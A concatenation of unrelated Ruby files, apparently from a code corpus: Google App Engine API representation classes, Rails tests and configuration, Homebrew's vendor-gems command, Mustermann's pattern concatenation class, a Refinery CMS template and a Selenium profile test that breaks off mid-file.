property :next_page_token, as: 'nextPageToken'
end
end
class ListDomainMappingsResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :domain_mappings, as: 'domainMappings', class: Google::Apis::AppengineV1beta::DomainMapping, decorator: Google::Apis::AppengineV1beta::DomainMapping::Representation
property :next_page_token, as: 'nextPageToken'
end
end
class ListIngressRulesResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :ingress_rules, as: 'ingressRules', class: Google::Apis::AppengineV1beta::FirewallRule, decorator: Google::Apis::AppengineV1beta::FirewallRule::Representation
property :next_page_token, as: 'nextPageToken'
end
end
class ListInstancesResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :instances, as: 'instances', class: Google::Apis::AppengineV1beta::Instance, decorator: Google::Apis::AppengineV1beta::Instance::Representation
property :next_page_token, as: 'nextPageToken'
end
end
class ListLocationsResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :locations, as: 'locations', class: Google::Apis::AppengineV1beta::Location, decorator: Google::Apis::AppengineV1beta::Location::Representation
property :next_page_token, as: 'nextPageToken'
end
end
class ListOperationsResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :next_page_token, as: 'nextPageToken'
collection :operations, as: 'operations', class: Google::Apis::AppengineV1beta::Operation, decorator: Google::Apis::AppengineV1beta::Operation::Representation
end
end
class ListServicesResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :next_page_token, as: 'nextPageToken'
collection :services, as: 'services', class: Google::Apis::AppengineV1beta::Service, decorator: Google::Apis::AppengineV1beta::Service::Representation
end
end
class ListVersionsResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :next_page_token, as: 'nextPageToken'
collection :versions, as: 'versions', class: Google::Apis::AppengineV1beta::Version, decorator: Google::Apis::AppengineV1beta::Version::Representation
end
end
class LivenessCheck
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :check_interval, as: 'checkInterval'
property :failure_threshold, as: 'failureThreshold'
property :host, as: 'host'
property :initial_delay, as: 'initialDelay'
property :path, as: 'path'
property :success_threshold, as: 'successThreshold'
property :timeout, as: 'timeout'
end
end
class Location
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :display_name, as: 'displayName'
hash :labels, as: 'labels'
property :location_id, as: 'locationId'
hash :metadata, as: 'metadata'
property :name, as: 'name'
end
end
class LocationMetadata
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :flexible_environment_available, as: 'flexibleEnvironmentAvailable'
property :standard_environment_available, as: 'standardEnvironmentAvailable'
end
end
class ManagedCertificate
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :last_renewal_time, as: 'lastRenewalTime'
property :status, as: 'status'
end
end
class ManualScaling
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :instances, as: 'instances'
end
end
class Network
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :forwarded_ports, as: 'forwardedPorts'
property :instance_tag, as: 'instanceTag'
property :name, as: 'name'
property :session_affinity, as: 'sessionAffinity'
property :subnetwork_name, as: 'subnetworkName'
end
end
class NetworkUtilization
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :target_received_bytes_per_second, as: 'targetReceivedBytesPerSecond'
property :target_received_packets_per_second, as: 'targetReceivedPacketsPerSecond'
property :target_sent_bytes_per_second, as: 'targetSentBytesPerSecond'
property :target_sent_packets_per_second, as: 'targetSentPacketsPerSecond'
end
end
class OAuth2ClientInfo
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :application_name, as: 'applicationName'
property :client_name, as: 'clientName'
property :developer_email_address, as: 'developerEmailAddress'
end
end
class Operation
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :done, as: 'done'
property :error, as: 'error', class: Google::Apis::AppengineV1beta::Status, decorator: Google::Apis::AppengineV1beta::Status::Representation
hash :metadata, as: 'metadata'
property :name, as: 'name'
hash :response, as: 'response'
end
end
class OperationMetadata
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :end_time, as: 'endTime'
property :insert_time, as: 'insertTime'
property :method_prop, as: 'method'
property :operation_type, as: 'operationType'
property :target, as: 'target'
property :user, as: 'user'
end
end
class OperationMetadataV1
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :create_version_metadata, as: 'createVersionMetadata', class: Google::Apis::AppengineV1beta::CreateVersionMetadataV1, decorator: Google::Apis::AppengineV1beta::CreateVersionMetadataV1::Representation
property :end_time, as: 'endTime'
property :ephemeral_message, as: 'ephemeralMessage'
property :insert_time, as: 'insertTime'
property :method_prop, as: 'method'
property :target, as: 'target'
property :user, as: 'user'
collection :warning, as: 'warning'
end
end
class OperationMetadataV1Alpha
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :create_version_metadata, as: 'createVersionMetadata', class: Google::Apis::AppengineV1beta::CreateVersionMetadataV1Alpha, decorator: Google::Apis::AppengineV1beta::CreateVersionMetadataV1Alpha::Representation
property :end_time, as: 'endTime'
property :ephemeral_message, as: 'ephemeralMessage'
property :insert_time, as: 'insertTime'
property :method_prop, as: 'method'
property :target, as: 'target'
property :user, as: 'user'
collection :warning, as: 'warning'
end
end
class OperationMetadataV1Beta
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :create_version_metadata, as: 'createVersionMetadata', class: Google::Apis::AppengineV1beta::CreateVersionMetadataV1Beta, decorator: Google::Apis::AppengineV1beta::CreateVersionMetadataV1Beta::Representation
property :end_time, as: 'endTime'
property :ephemeral_message, as: 'ephemeralMessage'
property :insert_time, as: 'insertTime'
property :method_prop, as: 'method'
property :target, as: 'target'
property :user, as: 'user'
collection :warning, as: 'warning'
end
end
class OperationMetadataV1Beta5
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :end_time, as: 'endTime'
property :insert_time, as: 'insertTime'
property :method_prop, as: 'method'
property :target, as: 'target'
property :user, as: 'user'
end
end
class ReadinessCheck
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :app_start_timeout, as: 'appStartTimeout'
property :check_interval, as: 'checkInterval'
property :failure_threshold, as: 'failureThreshold'
property :host, as: 'host'
property :path, as: 'path'
property :success_threshold, as: 'successThreshold'
property :timeout, as: 'timeout'
end
end
class RepairApplicationRequest
# @private
class Representation < Google::Apis::Core::JsonRepresentation
end
end
class RequestUtilization
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :target_concurrent_requests, as: 'targetConcurrentRequests'
property :target_request_count_per_second, as: 'targetRequestCountPerSecond'
end
end
class ResourceRecord
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :name, as: 'name'
property :rrdata, as: 'rrdata'
property :type, as: 'type'
end
end
class Resources
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :cpu, as: 'cpu'
property :disk_gb, as: 'diskGb'
property :memory_gb, as: 'memoryGb'
collection :volumes, as: 'volumes', class: Google::Apis::AppengineV1beta::Volume, decorator: Google::Apis::AppengineV1beta::Volume::Representation
end
end
class ScriptHandler
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :script_path, as: 'scriptPath'
end
end
class Service
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :id, as: 'id'
property :name, as: 'name'
property :split, as: 'split', class: Google::Apis::AppengineV1beta::TrafficSplit, decorator: Google::Apis::AppengineV1beta::TrafficSplit::Representation
end
end
class SslSettings
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :certificate_id, as: 'certificateId'
property :pending_managed_certificate_id, as: 'pendingManagedCertificateId'
property :ssl_management_type, as: 'sslManagementType'
end
end
class StandardSchedulerSettings
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :max_instances, as: 'maxInstances'
property :min_instances, as: 'minInstances'
property :target_cpu_utilization, as: 'targetCpuUtilization'
property :target_throughput_utilization, as: 'targetThroughputUtilization'
end
end
class StaticFilesHandler
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :application_readable, as: 'applicationReadable'
property :expiration, as: 'expiration'
hash :http_headers, as: 'httpHeaders'
property :mime_type, as: 'mimeType'
property :path, as: 'path'
property :require_matching_file, as: 'requireMatchingFile'
property :upload_path_regex, as: 'uploadPathRegex'
end
end
class Status
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :code, as: 'code'
collection :details, as: 'details'
property :message, as: 'message'
end
end
class TrafficSplit
# @private
class Representation < Google::Apis::Core::JsonRepresentation
hash :allocations, as: 'allocations'
property :shard_by, as: 'shardBy'
end
end
class UrlDispatchRule
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :domain, as: 'domain'
property :path, as: 'path'
property :service, as: 'service'
end
end
class UrlMap
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :api_endpoint, as: 'apiEndpoint', class: Google::Apis::AppengineV1beta::ApiEndpointHandler, decorator: Google::Apis::AppengineV1beta::ApiEndpointHandler::Representation
property :auth_fail_action, as: 'authFailAction'
property :login, as: 'login'
property :redirect_http_response_code, as: 'redirectHttpResponseCode'
property :script, as: 'script', class: Google::Apis::AppengineV1beta::ScriptHandler, decorator: Google::Apis::AppengineV1beta::ScriptHandler::Representation
property :security_level, as: 'securityLevel'
property :static_files, as: 'staticFiles', class: Google::Apis::AppengineV1beta::StaticFilesHandler, decorator: Google::Apis::AppengineV1beta::StaticFilesHandler::Representation
property :url_regex, as: 'urlRegex'
end
end
class Version
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :api_config, as: 'apiConfig', class: Google::Apis::AppengineV1beta::ApiConfigHandler, decorator: Google::Apis::AppengineV1beta::ApiConfigHandler::Representation
property :automatic_scaling, as: 'automaticScaling', class: Google::Apis::AppengineV1beta::AutomaticScaling, decorator: Google::Apis::AppengineV1beta::AutomaticScaling::Representation
property :basic_scaling, as: 'basicScaling', class: Google::Apis::AppengineV1beta::BasicScaling, decorator: Google::Apis::AppengineV1beta::BasicScaling::Representation
hash :beta_settings, as: 'betaSettings'
property :create_time, as: 'createTime'
property :created_by, as: 'createdBy'
property :default_expiration, as: 'defaultExpiration'
property :deployment, as: 'deployment', class: Google::Apis::AppengineV1beta::Deployment, decorator: Google::Apis::AppengineV1beta::Deployment::Representation
property :disk_usage_bytes, :numeric_string => true, as: 'diskUsageBytes'
property :endpoints_api_service, as: 'endpointsApiService', class: Google::Apis::AppengineV1beta::EndpointsApiService, decorator: Google::Apis::AppengineV1beta::EndpointsApiService::Representation
property :entrypoint, as: 'entrypoint', class: Google::Apis::AppengineV1beta::Entrypoint, decorator: Google::Apis::AppengineV1beta::Entrypoint::Representation
property :env, as: 'env'
hash :env_variables, as: 'envVariables'
collection :error_handlers, as: 'errorHandlers', class: Google::Apis::AppengineV1beta::ErrorHandler, decorator: Google::Apis::AppengineV1beta::ErrorHandler::Representation
collection :handlers, as: 'handlers', class: Google::Apis::AppengineV1beta::UrlMap, decorator: Google::Apis::AppengineV1beta::UrlMap::Representation
property :health_check, as: 'healthCheck', class: Google::Apis::AppengineV1beta::HealthCheck, decorator: Google::Apis::AppengineV1beta::HealthCheck::Representation
property :id, as: 'id'
collection :inbound_services, as: 'inboundServices'
property :instance_class, as: 'instanceClass'
collection :libraries, as: 'libraries', class: Google::Apis::AppengineV1beta::Library, decorator: Google::Apis::AppengineV1beta::Library::Representation
property :liveness_check, as: 'livenessCheck', class: Google::Apis::AppengineV1beta::LivenessCheck, decorator: Google::Apis::AppengineV1beta::LivenessCheck::Representation
property :manual_scaling, as: 'manualScaling', class: Google::Apis::AppengineV1beta::ManualScaling, decorator: Google::Apis::AppengineV1beta::ManualScaling::Representation
property :name, as: 'name'
property :network, as: 'network', class: Google::Apis::AppengineV1beta::Network, decorator: Google::Apis::AppengineV1beta::Network::Representation
property :nobuild_files_regex, as: 'nobuildFilesRegex'
property :readiness_check, as: 'readinessCheck', class: Google::Apis::AppengineV1beta::ReadinessCheck, decorator: Google::Apis::AppengineV1beta::ReadinessCheck::Representation
property :resources, as: 'resources', class: Google::Apis::AppengineV1beta::Resources, decorator: Google::Apis::AppengineV1beta::Resources::Representation
property :runtime, as: 'runtime'
property :runtime_api_version, as: 'runtimeApiVersion'
property :runtime_channel, as: 'runtimeChannel'
property :serving_status, as: 'servingStatus'
property :threadsafe, as: 'threadsafe'
property :version_url, as: 'versionUrl'
property :vm, as: 'vm'
property :vpc_access_connector, as: 'vpcAccessConnector', class: Google::Apis::AppengineV1beta::VpcAccessConnector, decorator: Google::Apis::AppengineV1beta::VpcAccessConnector::Representation
collection :zones, as: 'zones'
end
end
class Volume
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :name, as: 'name'
property :size_gb, as: 'sizeGb'
property :volume_type, as: 'volumeType'
end
end
class VpcAccessConnector
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :name, as: 'name'
end
end
class ZipInfo
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :files_count, as: 'filesCount'
property :source_url, as: 'sourceUrl'
end
end
end
end
end
| 38.130298 | 230 | 0.649039 |
ff22b5e59c2807270040a0e1b256a1f287eee148
| 406 |
require 'coveralls'
Coveralls.wear!
require 'fakeweb'
require File.expand_path('../../../spec/spec_constants.rb', __FILE__)
require File.expand_path('../../../spec/api_stubs.rb', __FILE__)
ENV['HETZNER_API_CUCUMBER_TEST'] = "1"
# This long timeout is needed for JRuby, as each step launches a JRuby instance for the CLI
#
Before do
@aruba_timeout_seconds = 60
FakeWeb.allow_net_connect = false
end
| 23.882353 | 91 | 0.743842 |
2827e5acbce632f2fc6a014e82e43664a34243b9
| 42 |
SPEC_FILES = "spec/cypress/fixtures/files"
| 42 | 42 | 0.809524 |
e290e027a74503bef94bec360ae17b77912f63f1
| 152 |
class AddAttachmentsDataToApidaeObjects < ActiveRecord::Migration[5.1]
def change
add_column :apidae_objects, :attachments_data, :jsonb
end
end
| 25.333333 | 70 | 0.796053 |
1135fa20853e49856f5254eca8c7af4135c14ce6
| 1,602 |
require 'test_helper'
class FollowingTest < ActionDispatch::IntegrationTest
def setup
@user = users(:tom)
@other = users(:archer)
log_in_as(@user)
end
test "following page" do
get following_user_path(@user)
assert_not @user.following.empty?
assert_match @user.following.count.to_s, response.body
@user.following.each do |user|
assert_select "a[href=?]", user_path(user)
end
end
test "followers page" do
get followers_user_path(@user)
assert_not @user.followers.empty?
assert_match @user.followers.count.to_s, response.body
@user.followers.each do |user|
assert_select "a[href=?]", user_path(user)
end
end
test "should follow a user the standard way" do
assert_difference '@user.following.count', 1 do
post relationships_path, params: { followed_id: @other.id }
end
end
test "should follow a user with Ajax" do
assert_difference '@user.following.count', 1 do
      post relationships_path, params: { followed_id: @other.id }, xhr: true
end
end
test "should unfollow a user the standard way" do
@user.follow(@other)
relationship = @user.active_relationships.find_by(followed_id: @other.id)
assert_difference '@user.following.count', -1 do
delete relationship_path(relationship)
end
end
test "should unfollow a user with Ajax" do
@user.follow(@other)
relationship = @user.active_relationships.find_by(followed_id: @other.id)
assert_difference '@user.following.count', -1 do
delete relationship_path(relationship), xhr: true
end
end
end
| 28.105263 | 77 | 0.696005 |
0188f9d7ba420b01a60e31f808a62453c711f822
| 940 |
require "formula"
require "cli/parser"
module Homebrew
module_function
def vendor_gems_args
Homebrew::CLI::Parser.new do
usage_banner <<~EOS
`vendor-gems`
Install and commit Homebrew's vendored gems.
EOS
switch :debug
end
end
def vendor_gems
vendor_gems_args.parse
Homebrew.install_bundler!
ohai "cd #{HOMEBREW_LIBRARY_PATH}"
HOMEBREW_LIBRARY_PATH.cd do
ohai "bundle install --standalone"
safe_system "bundle", "install", "--standalone"
ohai "bundle pristine"
safe_system "bundle", "pristine"
ohai "git add vendor/bundle"
system "git", "add", "vendor/bundle"
if Formula["gpg"].installed?
ENV["PATH"] = PATH.new(ENV["PATH"])
.prepend(Formula["gpg"].opt_bin)
end
ohai "git commit"
system "git", "commit", "--message", "brew vendor-gems: commit updates."
end
end
end
| 21.363636 | 78 | 0.619149 |
61d1c408478e160d9b24bf059b454519983eaf95
| 1,081 |
require_relative 'boot'
require "rails"
# Pick the frameworks you want:
require "active_model/railtie"
require "active_job/railtie"
require "active_record/railtie"
require "action_controller/railtie"
require "action_mailer/railtie"
require "action_view/railtie"
require "action_cable/engine"
require "sprockets/railtie"
# require "rails/test_unit/railtie"
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module Rkr
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
config.time_zone = 'Berlin'
config.active_job.queue_adapter = :sucker_punch
config.eager_load_paths += Dir[Rails.root.join('app', 'models', '{*/}')]
config.eager_load_paths += Dir[Rails.root.join('app', 'validators')]
config.middleware.insert_before 0, :TagSuggestions
end
end
| 34.870968 | 82 | 0.764107 |
2875718e2c942b7dc78ab35d1eb7a8b9b7c322fc
| 538 |
cask "font-cabin-condensed" do
version :latest
sha256 :no_check
# github.com/google/fonts/ was verified as official when first introduced to the cask
url "https://github.com/google/fonts/trunk/ofl/cabincondensed",
using: :svn,
trust_cert: true
name "Cabin Condensed"
homepage "https://fonts.google.com/specimen/Cabin+Condensed"
depends_on macos: ">= :sierra"
font "CabinCondensed-Bold.ttf"
font "CabinCondensed-Medium.ttf"
font "CabinCondensed-Regular.ttf"
font "CabinCondensed-SemiBold.ttf"
end
| 28.315789 | 87 | 0.728625 |
79da7a186cac476af8506681c66912edcd7a13cc
| 311 |
require "rubygems"
arg = ARGV.first.nil? ? 4 : ARGV.first.to_i
password = []
dictionary = File.expand_path(File.join(__FILE__, "..", "dictionary.txt"))
words = File.readlines(dictionary)
arg.times do
  # Pick a random word from the dictionary (duplicates across segments are possible)
  segment = words.sample.strip
password.push(segment)
end
puts password.join('')
| 22.214286 | 74 | 0.681672 |
871fdc76599503f32dd3d8093b9272e81a7f91bb
| 2,480 |
# frozen_string_literal: true
module DeviseTokenAuth
class ApplicationController < DeviseTokenAuth.parent_controller.constantize
include DeviseTokenAuth::Concerns::SetUserByToken
def resource_data(opts = {})
response_data = opts[:resource_json] || @resource.as_json
response_data['type'] = @resource.class.name.parameterize if json_api?
response_data
end
def resource_errors
@resource.errors.to_hash.merge(full_messages: @resource.errors.full_messages)
end
protected
def blacklisted_redirect_url?
DeviseTokenAuth.redirect_whitelist && !DeviseTokenAuth::Url.whitelisted?(@redirect_url)
end
def build_redirect_headers(access_token, client, redirect_header_options = {})
{
DeviseTokenAuth.headers_names[:"access-token"] => access_token,
DeviseTokenAuth.headers_names[:"client"] => client,
:config => params[:config],
# Legacy parameters which may be removed in a future release.
# Consider using "client" and "access-token" in client code.
# See: github.com/lynndylanhurley/devise_token_auth/issues/993
:client_id => client,
:token => access_token
}.merge(redirect_header_options)
end
def params_for_resource(resource)
devise_parameter_sanitizer.instance_values['permitted'][resource].each do |type|
params[type.to_s] ||= request.headers[type.to_s] unless request.headers[type.to_s].nil?
end
devise_parameter_sanitizer.instance_values['permitted'][resource]
end
def resource_class(m = nil)
if m
mapping = Devise.mappings[m]
else
mapping = Devise.mappings[resource_name] || Devise.mappings.values.first
end
mapping.to
end
def json_api?
return false unless defined?(ActiveModel::Serializer)
return ActiveModel::Serializer.setup do |config|
config.adapter == :json_api
end if ActiveModel::Serializer.respond_to?(:setup)
ActiveModelSerializers.config.adapter == :json_api
end
def recoverable_enabled?
resource_class.devise_modules.include?(:recoverable)
end
def confirmable_enabled?
resource_class.devise_modules.include?(:confirmable)
end
def render_error(status, message, data = nil)
response = {
success: false,
errors: [message]
}
response = response.merge(data) if data
render json: response, status: status
end
end
end
| 31 | 95 | 0.692742 |
d545036b2cd5d23593049129739785c0fb5d101c
| 4,095 |
# frozen_string_literal: true
module Mustermann
# Class for pattern objects that are a concatenation of other patterns.
# @see Mustermann::Pattern#+
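  #
  # @example Combining two patterns of different types (an illustrative sketch;
  #   the pattern strings and values here are hypothetical, and the exact classes
  #   involved depend on the pattern types and options being combined)
  #   prefix = Mustermann.new('/api', type: :identity)
  #   route  = prefix + Mustermann.new('/:resource')
  #   route.params('/api/users') # => { "resource" => "users" }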
class Concat < Composite
# Mixin for patterns to support native concatenation.
# @!visibility private
module Native
# @see Mustermann::Pattern#+
# @!visibility private
def +(other)
other &&= Mustermann.new(other, type: :identity, **options)
if (patterns = look_ahead(other)) && !patterns.empty?
concat = (self + patterns.inject(:+))
concat + other.patterns.slice(patterns.length..-1).inject(:+)
else
return super unless native = native_concat(other)
self.class.new(native, **options)
end
end
# @!visibility private
def look_ahead(other)
return unless other.is_a?(Concat)
other.patterns.take_while(&method(:native_concat?))
end
# @!visibility private
def native_concat(other)
"#{self}#{other}" if native_concat?(other)
end
# @!visibility private
def native_concat?(other)
other.class == self.class and other.options == options
end
private :native_concat, :native_concat?
end
# Should not be used directly.
# @!visibility private
def initialize(*)
super
AST::Validation.validate(combined_ast) if respond_to? :expand
end
# @see Mustermann::Composite#operator
# @return [Symbol] always :+
def operator
:+
end
# @see Mustermann::Pattern#===
def ===(string)
peek_size(string) == string.size
end
# @see Mustermann::Pattern#match
def match(string)
peeked = peek_match(string)
peeked if peeked.to_s == string
end
# @see Mustermann::Pattern#params
def params(string)
params, size = peek_params(string)
params if size == string.size
end
# @see Mustermann::Pattern#peek_size
def peek_size(string)
pump(string) { |p,s| p.peek_size(s) }
end
# @see Mustermann::Pattern#peek_match
def peek_match(string)
pump(string, initial: SimpleMatch.new) do |pattern, substring|
return unless match = pattern.peek_match(substring)
[match, match.to_s.size]
end
end
# @see Mustermann::Pattern#peek_params
def peek_params(string)
pump(string, inject_with: :merge, with_size: true) { |p, s| p.peek_params(s) }
end
# (see Mustermann::Pattern#expand)
def expand(behavior = nil, values = {})
raise NotImplementedError, 'expanding not supported' unless respond_to? :expand
@expander ||= Mustermann::Expander.new(self) { combined_ast }
@expander.expand(behavior, values)
end
# (see Mustermann::Pattern#to_templates)
def to_templates
raise NotImplementedError, 'template generation not supported' unless respond_to? :to_templates
@to_templates ||= patterns.inject(['']) { |list, pattern| list.product(pattern.to_templates).map(&:join) }.uniq
end
# @!visibility private
def respond_to_special?(method)
method = :to_ast if method.to_sym == :expand
patterns.all? { |p| p.respond_to?(method) }
end
# used to generate results for various methods by scanning through an input string
# @!visibility private
def pump(string, inject_with: :+, initial: nil, with_size: false)
substring = string
results = Array(initial)
patterns.each do |pattern|
result, size = yield(pattern, substring)
return unless result
results << result
size ||= result
substring = substring[size..-1]
end
results = results.inject(inject_with)
with_size ? [results, string.size - substring.size] : results
end
# generates one big AST from all patterns
# will not check if patterns support AST generation
# @!visibility private
def combined_ast
payload = patterns.map { |p| AST::Node[:group].new(p.to_ast.payload) }
AST::Node[:root].new(payload)
end
private :combined_ast, :pump
end
end
| 29.890511 | 117 | 0.640293 |
f8c10d7e9ad38c4008baf4422e3c5ab1f89fe611
| 1,481 |
require 'rbconfig'
VERSION_BAND = '2.1'
MINOR_VERSION_BAND = '2.1.2'
# We want to ensure that you have an ExecJS runtime available!
begin
require 'execjs'
rescue LoadError
abort "ExecJS is not installed. Please re-start the installer after running:\ngem install execjs"
end
if File.read("#{destination_root}/Gemfile") !~ /assets.+coffee-rails/m
gem "coffee-rails", :group => :assets
end
append_file 'Gemfile', <<-GEMFILE
# Refinery CMS
gem 'refinerycms', '~> #{VERSION_BAND}'
# Optionally, specify additional Refinery CMS Extensions here:
gem 'refinerycms-acts-as-indexed', ['~> 1.0', '>= 1.0.0']
gem 'refinerycms-wymeditor', ['~> 1.0', '>= 1.0.6']
# gem 'refinerycms-blog', ['~> #{VERSION_BAND}', '>= #{MINOR_VERSION_BAND}']
# gem 'refinerycms-inquiries', ['~> #{VERSION_BAND}', '>= #{MINOR_VERSION_BAND}']
# gem 'refinerycms-search', ['~> #{VERSION_BAND}', '>= #{MINOR_VERSION_BAND}']
# gem 'refinerycms-page-images', ['~> #{VERSION_BAND}', '>= #{MINOR_VERSION_BAND}']
GEMFILE
begin
require 'execjs'
::ExecJS::Runtimes.autodetect
rescue
gsub_file 'Gemfile', "# gem 'therubyracer'", "gem 'therubyracer'"
end
run 'bundle install'
rake 'db:create'
generate "refinery:cms --fresh-installation #{ARGV.join(' ')}"
say <<-SAY
============================================================================
Your new Refinery CMS application is now installed and mounts at '/'
============================================================================
SAY
| 31.510638 | 99 | 0.615125 |
d53cf8c44611f9ae7e74003acb6ab7b3e82f72ab
| 2,731 |
require 'rails_helper'
describe ActionCableListener do
let(:listener) { described_class.instance }
let!(:account) { create(:account) }
let!(:admin) { create(:user, account: account, role: :administrator) }
let!(:inbox) { create(:inbox, account: account) }
let!(:agent) { create(:user, account: account, role: :agent) }
let!(:conversation) { create(:conversation, account: account, inbox: inbox, assignee: agent) }
before do
create(:inbox_member, inbox: inbox, user: agent)
end
describe '#message_created' do
let(:event_name) { :'message.created' }
let!(:message) do
create(:message, message_type: 'outgoing',
account: account, inbox: inbox, conversation: conversation)
end
let!(:event) { Events::Base.new(event_name, Time.zone.now, message: message) }
it 'sends message to account admins, inbox agents and the contact' do
# HACK: to reload conversation inbox members
expect(conversation.inbox.reload.inbox_members.count).to eq(1)
expect(ActionCableBroadcastJob).to receive(:perform_later).with(
[agent.pubsub_token, admin.pubsub_token, conversation.contact.pubsub_token], 'message.created', message.push_event_data
)
listener.message_created(event)
end
end
describe '#typing_on' do
let(:event_name) { :'conversation.typing_on' }
let!(:event) { Events::Base.new(event_name, Time.zone.now, conversation: conversation, user: agent) }
it 'sends message to account admins, inbox agents and the contact' do
# HACK: to reload conversation inbox members
expect(conversation.inbox.reload.inbox_members.count).to eq(1)
expect(ActionCableBroadcastJob).to receive(:perform_later).with(
[admin.pubsub_token, conversation.contact.pubsub_token],
'conversation.typing_on', conversation: conversation.push_event_data,
user: agent.push_event_data
)
listener.conversation_typing_on(event)
end
end
describe '#typing_off' do
let(:event_name) { :'conversation.typing_off' }
let!(:event) { Events::Base.new(event_name, Time.zone.now, conversation: conversation, user: agent) }
it 'sends message to account admins, inbox agents and the contact' do
# HACK: to reload conversation inbox members
expect(conversation.inbox.reload.inbox_members.count).to eq(1)
expect(ActionCableBroadcastJob).to receive(:perform_later).with(
[admin.pubsub_token, conversation.contact.pubsub_token],
'conversation.typing_off', conversation: conversation.push_event_data,
user: agent.push_event_data
)
listener.conversation_typing_off(event)
end
end
end
| 42.015385 | 127 | 0.691322 |
acb6e5813808cc439daa0639260178cb4407b93b
| 814 |
# coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'draw_kingdom/version'
Gem::Specification.new do |spec|
spec.name = "draw_kingdom"
spec.version = DrawKingdom::VERSION
spec.authors = ["Asaf Shveki"]
spec.email = ["[email protected]"]
  spec.summary = "Summary"
  spec.description = "ssss"
spec.homepage = ""
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0")
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.7"
spec.add_development_dependency "rake", "~> 10.0"
end
| 33.916667 | 74 | 0.630221 |
872fcf5fa0fc5eda9cfb8604a33f653b68429660
| 18,361 |
describe 'My Profile Contact Info', :testui => true, :order => :defined do
if ENV['UI_TEST'] && Settings.ui_selenium.layer == 'local'
include ClassLogger
# Load a test data file. See sample in the ui_selenium fixtures dir.
test_users = UserUtils.load_profile_test_data
student = test_users.first
contact_info = student['contactInfo']
addresses = contact_info['addresses']
before(:all) do
@driver = WebDriverUtils.launch_browser
@splash_page = CalCentralPages::SplashPage.new @driver
@cal_net_page = CalNetAuthPage.new @driver
@my_dashboard = CalCentralPages::MyDashboardPage.new @driver
@contact_info_card = CalCentralPages::MyProfileContactInfoCard.new @driver
@splash_page.log_into_dashboard(@driver, @cal_net_page, student['username'], student['password'])
@my_dashboard.click_profile_link @driver
@contact_info_card.click_contact_info
@contact_info_card.wait_until(WebDriverUtils.page_load_timeout) do
@contact_info_card.phone_label_element.visible?
@contact_info_card.email_label_element.visible?
@contact_info_card.address_label_element.visible?
end
end
after(:all) do
WebDriverUtils.quit_browser(@driver)
end
describe 'phone number' do
before(:all) do
# Get rid of any existing phone data
@contact_info_card.delete_all_phones
@possible_phone_types = %w(Local Mobile Home/Permanent)
@phones = contact_info['phones']
end
describe 'adding' do
before(:all) do
@mobile_phone = @phones.find { |phone| phone['type'] == 'Mobile' && phone['test'] == 'adding' }
@home_phone = @phones.find { |phone| phone['type'] == 'Home/Permanent' && phone['test'] == 'adding' }
@local_phone = @phones.find { |phone| phone['type'] == 'Local' && phone['test'] == 'adding' }
end
it 'requires that a phone number be entered' do
@contact_info_card.click_add_phone
@contact_info_card.save_phone_button_element.when_visible WebDriverUtils.page_event_timeout
expect(@contact_info_card.save_phone_button_element.attribute('disabled')).to eql('true')
@contact_info_card.click_cancel_phone
end
it 'allows a user to add a new phone' do
@contact_info_card.add_new_phone @home_phone
@contact_info_card.verify_phone(@home_phone, true)
end
it 'prevents a user adding a phone of the same type as an existing one' do
@contact_info_card.click_add_phone
expect(@contact_info_card.phone_type_options).not_to include('Home/Permanent')
end
it 'allows a user to save a new non-preferred phone' do
@contact_info_card.add_new_phone @mobile_phone
@contact_info_card.verify_phone @mobile_phone
end
it 'allows a maximum number of characters to be entered in each field' do
@contact_info_card.add_new_phone @local_phone
@contact_info_card.verify_phone @local_phone
end
end
describe 'editing' do
before(:all) do
@mobile_phone = @phones.find { |phone| phone['type'] == 'Mobile' && phone['test'] == 'editing' }
@home_phone = @phones.find { |phone| phone['type'] == 'Home/Permanent' && phone['test'] == 'editing' }
@local_phone = @phones.find { |phone| phone['type'] == 'Local' && phone['test'] == 'editing' }
@mobile_index = @contact_info_card.phone_type_index 'Mobile'
